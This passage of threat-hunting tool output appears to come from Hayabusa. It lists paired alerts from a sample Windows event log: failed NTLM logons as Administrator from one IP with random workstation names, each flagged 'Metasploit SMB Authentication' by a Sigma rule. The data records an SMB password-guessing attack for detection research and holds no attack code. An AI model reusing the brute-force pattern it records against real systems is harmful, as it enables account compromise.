Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oFjlyMAJMI2zIC8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7exAVz3PlzJQ6Wcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RuYihjQpt76foAW3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlPm2vRh9EHN9J6n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n9jDy3NDDPe7XgyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtGxqEKOoP6W3w0Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BLqYztXwV80UBez1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0yki1dEFZrnMLs2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jbE2z1W1wQgoTDso : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJmZFXFxiLuWWkMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x9EPwprgXSJNUFfg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h0ZjYxZ8K5m5F1vo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xSw7OjDv8ldqbm5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mk0BAdOI210HwPhX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSwWz57Kvl2XJVUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DLcfSrHT5bSsNnuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQDkbESps0PXWEUT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpnyzkXasuyAtdn1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ps9IqJzTliJvzpIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V7PLb2uRTIY8t123 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sHAJ9p0QbSRxhvtk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YRiE1wGrwWAx0feP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Flo4bCVjmlaHz0QS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HscUujSzd3Ua7dqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aIQPTx67aEer51wb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MqUoXUf7PKIaoDjs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.191 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wzeB4DAS1W633tmh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.222 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UTtXTrqHoCZMbDLT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.263 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4HVv5PgPhiDW3qcj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.311 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g21VoO45UrIbTuZO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rGpD7AJUTekDmd6Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.383 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OykzTOn7B9THv0cT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.423 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cIYOrBBwX8nFpCzw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SvnROHLMVnmPfAyy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.508 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5EwJ84H7kXQXzGZz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34RLeLWDgLayU3JM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QaXHGUgboODAi5Qu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.619 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QlOlZ0m397CsmaeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.659 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N24rSPCI8DsQIPXR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.699 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5y2tgoUcs6mFPZm4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.738 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HmFX6MioYqaMumgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.776 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R4HRWlPWPKy1Cicq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.820 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GDUf7wVbHkS9uaPC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eBX0Lviz6Bv5rGcb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.917 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zZwPm9qahLU78FRY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jOVsopykTHNQcYUp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n8DY7sdDY8nuWdME : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 